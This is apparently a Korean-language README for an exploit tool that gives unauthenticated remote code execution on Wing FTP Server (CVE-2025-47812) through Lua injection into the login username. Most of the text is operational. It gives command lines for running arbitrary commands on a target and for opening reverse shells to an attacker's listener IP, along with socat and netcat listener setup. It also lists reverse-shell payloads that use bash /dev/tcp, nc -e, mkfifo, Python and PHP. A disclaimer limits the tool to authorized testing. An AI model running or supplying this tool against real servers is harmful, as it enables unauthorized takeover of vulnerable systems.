
Wing FTP Server(CVE-2025-47812)용 인증되지 않은 원격 코드 실행 익스플로잇으로, 여러 리버스 셸 페이로드, 대화형 및 CLI 모드, 자동 세션 처리를 지원합니다.
| 필드 | 값 |
|---|---|
| CVE | CVE-2025-47812 |
| 영향받는 버전 | Wing FTP Server < 7.4.4 |
| 유형 | 인증 없는 원격 코드 실행 |
| CVSS 점수 | 10.0 (치명적) |
| 수정 버전 | Wing FTP Server 7.4.4 |
이 취약점은 /loginok.html 로그인 엔드포인트에 존재합니다. 서버는 username 필드의 널 바이트(%00)를 제대로 검증하지 못합니다. 이로 인해 공격자는 세션 파일에 임의의 Lua 코드를 주입할 수 있으며, 이 세션 파일은 /dir.html과 같은 엔드포인트에 접근할 때 서버 측에서 평가됩니다. 이 과정에는 어떠한 인증도 필요하지 않습니다.
참고: https://nvd.nist.gov/vuln/detail/CVE-2025-47812
--payload 플래그로 특정 페이로드 선택-o 옵션으로 명령 출력을 파일에 저장--timeout 및 --delay-v 옵션을 통한 상세/디버그 모드Ctrl+C 우아한 처리pip install requests
python3 wingftp_rce_exploit.py
# Run a command
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -c "id"
# Save output to file
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -c "id" -o results.txt
# Reverse shell (try all payloads)
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r 10.10.15.92 -p 4444
# Reverse shell (specific payload)
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r 10.10.15.92 -p 4444 --payload socat
-u / --url Target base URL
-U / --username Login username (default: anonymous)
-c / --command Command to run (command mode)
-r / --rhost Your listener IP (reverse shell mode)
-p / --rport Your listener port (reverse shell mode)
--payload Specific payload to use (see list below)
--timeout HTTP request timeout in seconds (default: 10)
--delay Delay between payload attempts in seconds (default: 4)
-o / --output Save command output to file
-v / --verbose Enable debug output
Target URL : http://192.168.1.10:5466
Username : anonymous
Choice : 1
Command : whoami
1단계 — 리스너 시작 (전체 TTY에는 socat 권장):
socat file:`tty`,raw,echo=0 tcp-listen:4444,reuseaddr
또는 nc 사용:
nc -lvnp 4444
2단계 — 익스플로잇 실행:
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r YOUR_IP -p 4444
이 도구는 교육 목적 및 승인된 보안 테스트 전용으로 제작되었습니다.
소유하지 않았거나 명시적인 서면 허가를 받지 않은 시스템에는 사용하지 마십시오.
무단 사용은 불법입니다. 저자는 오용에 대해 어떠한 책임도 지지 않습니다.
| 이름 | 방식 |
|---|
socat | socat을 통한 전체 PTY |
bash | /dev/tcp 리다이렉트 |
python3 | 소켓 서브프로세스 |
nc-e | -e 플래그를 사용하는 Netcat |
nc-fifo | Netcat + mkfifo |
php | PHP fsockopen |